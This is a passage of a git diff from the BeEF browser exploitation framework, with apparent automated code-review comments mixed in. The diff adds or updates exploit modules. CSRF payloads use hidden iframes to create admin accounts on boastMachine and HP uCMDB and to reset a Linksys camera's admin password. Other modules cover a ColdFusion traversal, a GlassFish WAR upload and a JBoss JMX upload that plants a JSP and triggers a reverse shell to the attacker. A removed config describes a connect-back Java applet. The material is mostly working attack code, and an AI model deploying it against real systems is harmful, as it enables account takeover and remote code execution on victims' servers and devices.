More exploits to come soon." + authors: ["antisnatchor", "tymiller"] # shellcode awesomeness -> Ty Miller + target: + working: ["FF"] diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb new file mode 100755 index 000000000..62a042541 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb @@ -0,0 +1,30 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Beef_bind_staged_deploy < BeEF::Core::Command + + def self.options + configuration = BeEF::Core::Configuration.instance + beef_host = "#{configuration.get("beef.http.host")}" + beef_port = "#{configuration.get("beef.http.port")}" + + return [ + { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'}, + { 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '143'}, + { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'}, + { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'}, + { 'name' => 'delay', 'ui_label' => 'Add delay (ms)', 'value' => '4000'}, + { 'name' => 'beef_host', 'ui_label' => 'BeEF Host', 'value' => beef_host}, + { 'name' => 'beef_port', 'ui_label' => 'BeEF Port', 'value' => beef_port}, + { 'name' => 'beef_junk_port', 'ui_label' => 'BeEF Junk Port', 'value' => '2000'}, + { 'name' => 'beef_junk_socket', 'ui_label' => 'BeEF Junk Socket Name', 'value' => 'imapeudora1'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/command.js b/modules/exploits/boastmachine_3_1_add_user_csrf/command.js new file mode 100644 index 000000000..a456ebdc6 --- /dev/null +++ b/modules/exploits/boastmachine_3_1_add_user_csrf/command.js 
@@ -0,0 +1,32 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var base = '<%= @base %>'; + var username = '<%= @username %>'; + var password = '<%= @password %>'; + var email = '<%= @email %>'; + + var boastmachine_iframe = beef.dom.createIframeXsrfForm(base, "POST", [ + {'type':'hidden', 'name':'action', 'value':'add_user'}, + {'type':'hidden', 'name':'do', 'value':'add'}, + {'type':'hidden', 'name':'user_login', 'value':username}, + {'type':'hidden', 'name':'user_pass', 'value':password}, + {'type':'hidden', 'name':'user_name', 'value':username}, + {'type':'hidden', 'name':'user_email', 'value':email}, + {'type':'hidden', 'name':'blogs[]', 'value':'4'}, + {'type':'hidden', 'name':'user_level', 'value':'4'}, + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(boastmachine_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml new file mode 100644 index 000000000..e081ee76e --- /dev/null +++ b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + boastmachine_add_user_csrf: + enable: true + category: "Exploits" + name: "boastMachine <= 3.1 Add User CSRF" + description: "Attempts to add a user to a boastMachine <= 3.1 install." + authors: ["bcoles", "Dr.NaNo"] + target: + unknown: ["ALL"] 
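Review bot: `cleanup` is assigned without `var` and invoked through the string form `setTimeout("cleanup()", 15000)`, so it lives on the page's global object rather than inside this module. linksys_wvc_wireless_camera_csrf/command.js in this commit defines a global with the same name. If both modules run in one page within 15 seconds, the later definition replaces the earlier one, so the first iframe is never removed and `removeChild` is called twice on the second iframe, where the repeat call would throw. Passing a closure avoids the shared name: `setTimeout(function () { document.body.removeChild(boastmachine_iframe); }, 15000);`.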
diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb new file mode 100644 index 000000000..d3960b92b --- /dev/null +++ b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb @@ -0,0 +1,21 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Boastmachine_add_user_csrf < BeEF::Core::Command + + def self.options + return [ + { 'name' => 'base', 'ui_label' => 'boastMachine URL', 'value' => 'http://target/bmc/admin.php?action=add_user&blog'}, + { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'}, + { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'}, + { 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/command.js b/modules/exploits/camera/dlink_dcs_series_csrf/command.js index 725d60c24..71fd886fd 100644 --- a/modules/exploits/camera/dlink_dcs_series_csrf/command.js +++ b/modules/exploits/camera/dlink_dcs_series_csrf/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var base = '<%= @base %>'; var passwd = '<%= @password %>'; diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml index af3d4a3f0..515f1faac 100644 --- a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml +++ b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # More info: http://www.exploit-db.com/exploits/18509/ # diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/module.rb b/modules/exploits/camera/dlink_dcs_series_csrf/module.rb index 49ed6809f..a96724404 100644 --- a/modules/exploits/camera/dlink_dcs_series_csrf/module.rb +++ b/modules/exploits/camera/dlink_dcs_series_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Dlink_dcs_series_csrf < BeEF::Core::Command 
diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js new file mode 100644 index 000000000..6ab1c5d73 --- /dev/null +++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js @@ -0,0 +1,35 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var gateway = '<%= @base %>'; + var path = 'adm/file.cgi'; + var passwd = '<%= @password %>'; + + var linksys_wvc_iframe = beef.dom.createIframeXsrfForm(gateway + path, "POST", + [{'type':'hidden', 'name':'adm', 'value':'admin'}, + {'type':'hidden', 'name':'admpw', 'value':passwd}, + {'type':'hidden', 'name':'admpwv', 'value':passwd}, + {'type':'hidden', 'name':'language', 'value':'1'}, + {'type':'hidden', 'name':'h_usernamelist', 'value':''}, + {'type':'hidden', 'name':'h_language', 'value':'1'}, + {'type':'hidden', 'name':'h_lang_from_mac','value':''}, + {'type':'hidden', 'name':'this_file', 'value':'pass_wd.htm'}, + {'type':'hidden', 'name':'next_file', 'value':'pass_wd.htm'}, + {'type':'hidden', 'name':'todo', 'value':'save'}, + {'type':'hidden', 'name':'video_file', 'value':''}, + {'type':'hidden', 'name':'', 'value':'Submit form'} + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(linksys_wvc_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml new file mode 100644 index 000000000..7ff69cab3 --- /dev/null +++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml 
@@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + linksys_wvc_wireless_camera_csrf: + enable: true + category: ["Exploits", "Camera"] + name: "Linksys WVC series CSRF" + description: "Attempts to change the admin password on a Linksys WVCseries wireless camera." + authors: ["bcoles", "n0x00"] + target: + working: ["ALL"] diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb new file mode 100644 index 000000000..6dc483e7b --- /dev/null +++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb @@ -0,0 +1,19 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Linksys_wvc_wireless_camera_csrf < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.101/'}, + {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/coldfusion_dir_traversal_exploit/command.js b/modules/exploits/coldfusion_dir_traversal_exploit/command.js index ec06b38d9..98992ae43 100644 --- a/modules/exploits/coldfusion_dir_traversal_exploit/command.js +++ b/modules/exploits/coldfusion_dir_traversal_exploit/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /** * ColdFusion Directory Traversal Exploit (CVE-2010-2861) by antisnatchor . * Inject into the vulnerable "locale" parameter the classic payload of a directory traversal. diff --git a/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml b/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml index e65daa2c1..09cae23bc 100644 --- a/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml +++ b/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/coldfusion_dir_traversal_exploit/module.rb b/modules/exploits/coldfusion_dir_traversal_exploit/module.rb index 21d58a474..7dee12c51 100644 --- a/modules/exploits/coldfusion_dir_traversal_exploit/module.rb +++ b/modules/exploits/coldfusion_dir_traversal_exploit/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Coldfusion_dir_traversal_exploit < BeEF::Core::Command 
diff --git a/modules/exploits/glassfish_war_upload_xsrf/command.js b/modules/exploits/glassfish_war_upload_xsrf/command.js index a7d2744ad..1e0e2a8e3 100644 --- a/modules/exploits/glassfish_war_upload_xsrf/command.js +++ b/modules/exploits/glassfish_war_upload_xsrf/command.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // This exploit is based on the PoC by Roberto Suggi Liverani - Security-Assessment.com // For more info, refer to: http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html 
@@ -25,99 +16,6 @@ beef.execute(function() { var logUrl = restHost + '/management/domain/applications/application'; - //BEGIN Daniel Guerrero binary Base64-library -/* -Copyright (c) 2011, Daniel Guerrero -All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are met: - * Redistributions of source code must retain the above copyright - notice, this list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above copyright - notice, this list of conditions and the following disclaimer in the - documentation and/or other materials provided with the distribution. - * Neither the name of the Daniel Guerrero nor the - names of its contributors may be used to endorse or promote products - derived from this software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -DISCLAIMED. IN NO EVENT SHALL DANIEL GUERRERO BE LIABLE FOR ANY -DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
- */ - -/** - * Uses the new array typed in javascript to binary base64 encode/decode - * at the moment just decodes a binary base64 encoded - * into either an ArrayBuffer (decodeArrayBuffer) - * or into an Uint8Array (decode) - * - * References: - * https://developer.mozilla.org/en/JavaScript_typed_arrays/ArrayBuffer - * https://developer.mozilla.org/en/JavaScript_typed_arrays/Uint8Array - */ - -var Base64Binary = { - _keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", - - /* will return a Uint8Array type */ - decodeArrayBuffer: function(input) { - var bytes = Math.ceil( (3*input.length) / 4.0); - var ab = new ArrayBuffer(bytes); - this.decode(input, ab); - - return ab; - }, - - decode: function(input, arrayBuffer) { - //get last chars to see if are valid - var lkey1 = this._keyStr.indexOf(input.charAt(input.length-1)); - var lkey2 = this._keyStr.indexOf(input.charAt(input.length-1)); - - var bytes = Math.ceil( (3*input.length) / 4.0); - if (lkey1 == 64) bytes--; //padding chars, so skip - if (lkey2 == 64) bytes--; //padding chars, so skip - - var uarray; - var chr1, chr2, chr3; - var enc1, enc2, enc3, enc4; - var i = 0; - var j = 0; - - if (arrayBuffer) - uarray = new Uint8Array(arrayBuffer); - else - uarray = new Uint8Array(bytes); - - input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); - - for (i=0; i> 4); - chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); - chr3 = ((enc3 & 3) << 6) | enc4; - - uarray[i] = chr1; - if (enc3 != 64) uarray[i+1] = chr2; - if (enc4 != 64) uarray[i+2] = chr3; - } - - return uarray; - } -} - //END Daniel Guerrero binary Base64-library if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { XMLHttpRequest.prototype.sendAsBinary = function(datastr) { 
@@ -204,10 +102,8 @@ var Base64Binary = { var c = "--" + boundary + "\r\n" c += 'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n'; c += "Content-Type: application/octet-stream\r\n\r\n"; - - for(var i = 0; i< value.length; i++){ - c+=String.fromCharCode(value[i] & 0xff); - } + + c += atob(value); c += "\r\n"; return c; @@ -215,7 +111,7 @@ var Base64Binary = { function start() { - fileUpload(Base64Binary.decode(warBase),warName); + fileUpload(warBase,warName); } start(); diff --git a/modules/exploits/glassfish_war_upload_xsrf/config.yaml b/modules/exploits/glassfish_war_upload_xsrf/config.yaml index 38febe15b..53633a7ab 100644 --- a/modules/exploits/glassfish_war_upload_xsrf/config.yaml +++ b/modules/exploits/glassfish_war_upload_xsrf/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: @@ -23,4 +13,4 @@ beef: authors: ["Bart Leppens"] target: working: ["FF", "S", "C"] - not_working: ["IE"] + not_working: ["IE", "O"] diff --git a/modules/exploits/glassfish_war_upload_xsrf/module.rb b/modules/exploits/glassfish_war_upload_xsrf/module.rb index a18ca8cd4..4b9586b13 100644 --- a/modules/exploits/glassfish_war_upload_xsrf/module.rb 
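Review bot: In the `@@ -204,10 +102,8 @@` hunk the multipart helper now expects `value` to be base64 text and decodes it with `c += atob(value);`, but nothing documents the changed contract or handles a decode failure. The removed `Base64Binary.decode` stripped characters outside the base64 alphabet before decoding, whereas `atob` throws on them, so a malformed `warBase` now raises an exception inside the helper instead of being cleaned silently. I would add a comment above the call, `// value: base64 text; atob() yields a binary string, one char per byte`, and decide explicitly whether a decode error should be reported back. The helper's signature lies outside the hunk, and the `@@ -215,7 +111,7 @@` hunk (`fileUpload(warBase,warName);`) relies on the same contract.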
+++ b/modules/exploits/glassfish_war_upload_xsrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Glassfish_war_upload_xsrf < BeEF::Core::Command diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/command.js b/modules/exploits/hp_ucmdb_add_user_csrf/command.js new file mode 100644 index 000000000..d30127f35 --- /dev/null +++ b/modules/exploits/hp_ucmdb_add_user_csrf/command.js 
@@ -0,0 +1,32 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + +beef.execute(function() { +var protocol = '<%= @protocol %>'; +var host = '<%= @host %>'; +var port = '<%= @port %>'; +var usertype = '<%= @usertype %>'; +var customerid = '<%= @customerid %>'; +var username = '<%= @username %>'; +var password = '<%= @password %>'; + +var url = protocol + '://' + host + ':' + port + '/' + 'HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=' + usertype; +url += '&arg0=' + customerid + '&arg1=' + username + '&arg2=' + password; + +if (usertype == 'createIntegrationUser'){ + url += '&arg3='; +} + +var ucmdb_iframe = beef.dom.createInvisibleIframe(); +ucmdb_iframe.setAttribute('src', url); + +cleanup = function() { + document.body.removeChild(ucmdb_iframe); +} +setTimeout("cleanup()", 15000); + +beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed"); +}); diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml b/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml new file mode 100644 index 000000000..50fc32640 --- /dev/null +++ b/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + hp_ucmdb_add_user_csrf: + enable: true + category: "Exploits" + name: "HP uCMDB 9.0x add user CSRF" + description: "This module attempts to add additional users to the HP uCMDB (universal configuration management database).
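Review bot: In hp_ucmdb_add_user_csrf/command.js, `cleanup = function() {…}` is assigned without `var` and then run through the string form `setTimeout("cleanup()", 15000)`, so the handler becomes a page-wide global that any other script defining `cleanup` can replace before the timer fires. Passing the function itself keeps it local and avoids evaluating a string: `setTimeout(function() { document.body.removeChild(ucmdb_iframe); }, 15000);`. The seven `'<%= @… %>'` values are also placed in single-quoted literals with no encoding, while activex_command_execution/command.js in this same commit applies a `gsub` to `@cmd`; the templates should follow one encoding convention. The `result=Command executed` message is sent unconditionally, so the stored result records that the module ran rather than that the request succeeded, which is worth stating in a comment.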
For more information please refer to http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html" + authors: ["Bart Leppens"] + target: + working: ["ALL"] diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/module.rb b/modules/exploits/hp_ucmdb_add_user_csrf/module.rb new file mode 100644 index 000000000..9781327d7 --- /dev/null +++ b/modules/exploits/hp_ucmdb_add_user_csrf/module.rb @@ -0,0 +1,31 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# + +class Hp_ucmdb_add_user_csrf < BeEF::Core::Command + + def self.options + return [ + { 'name' => 'protocol', 'type' => 'combobox', 'ui_label' => 'Protocol', 'store_type' => 'arraystore', + 'store_fields' => ['protocol'], 'store_data' => [['http'],['https']], + 'valueField' => 'protocol', 'displayField' => 'protocol', 'mode' => 'local', 'value' => 'http', 'autoWidth' => true + }, + {'name' => 'host', 'ui_label' => 'Host', 'value' => '127.0.0.1'}, + {'name' => 'port', 'ui_label' => 'Port', 'value' => '8080'}, + { 'name' => 'usertype', 'type' => 'combobox', 'ui_label' => 'Type of user', 'store_type' => 'arraystore', + 'store_fields' => ['usertype'], 'store_data' => [['createUser'],['createIntegrationUser']], + 'valueField' => 'usertype', 'displayField' => 'usertype', 'mode' => 'local', 'value' => 'createUser', 'autoWidth' => true + }, + {'name' => 'customerid', 'ui_label' => 'CustomerID', 'value' => '1'}, + {'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF'}, + {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/java_payload/config.yaml b/modules/exploits/java_payload/config.yaml deleted file mode 100755 index 0d58413ba..000000000 --- a/modules/exploits/java_payload/config.yaml +++ /dev/null 
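Review bot: In hp_ucmdb_add_user_csrf/module.rb the `username` and `password` options ship with fixed defaults (`'BeEF'` and `'__BeEF__'`), so a run with the form left untouched creates an account whose credentials are published in this repository. I would leave the password default empty, `{'name' => 'password', 'ui_label' => 'Desired password', 'value' => ''}`, so a value has to be chosen per engagement. `post_execute` saves only `@datastore['result']`, so the account name that was requested is not kept with the result; a comment above `self.options` noting that the created account has to be tracked and removed after testing would make that gap visible.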
@@ -1,26 +0,0 @@ -# -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -beef: - module: - java_payload: - enable: true - category: "Exploits" - name: "Java Payload" - description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.

Before launching it, be sure to have the JavaPayload StagerHandler listening,
i.e.: java javapayload.handler.stager.StagerHandler <payload> <IP> <port> -- JSh

Windows Vista is not supported." - authors: ["antisnatchor"] - target: - not_working: ["FF"] - user_notify: ["All"] diff --git a/modules/exploits/jboss_jmx_upload_exploit/command.js b/modules/exploits/jboss_jmx_upload_exploit/command.js index 1d64217ff..2fb1c10d2 100644 --- a/modules/exploits/jboss_jmx_upload_exploit/command.js +++ b/modules/exploits/jboss_jmx_upload_exploit/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /** * Jboss 6.0.0M1 JMX Upload Exploit * Ported from l33tb0y Ruby code in Javascript by antisnatchor. 
@@ -43,11 +34,11 @@ beef.execute(function() { uri = "/jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + jspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True"; /* always use dataType: script when doing cross-domain XHR, otherwise even if the HTTP resp is 200, jQuery.ajax will always launch the error() event*/ - beef.net.request("http", "HEAD", rhost, rport, uri,null, null, 10, 'script', function(response){ - if(response.status_code == "success"){ + beef.net.forge_request("http", "HEAD", rhost, rport, uri, null, null, null, 10, 'script', true, null,function(response){ + if(response.status_code == 200){ function triggerReverseConn(){ - beef.net.request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, 10, 'script', function(response){ - if(response.status_code == "success"){ + beef.net.forge_request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, null, 10, 'script', true, null,function(response){ + if(response.status_code == 200){ if(payloadType == "reverse"){ beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse JSP shell should have been triggered. Check your MSF handler listener."); }else{ @@ -64,4 +55,4 @@ beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: first HEAD request failed."); } }); -}); \ No 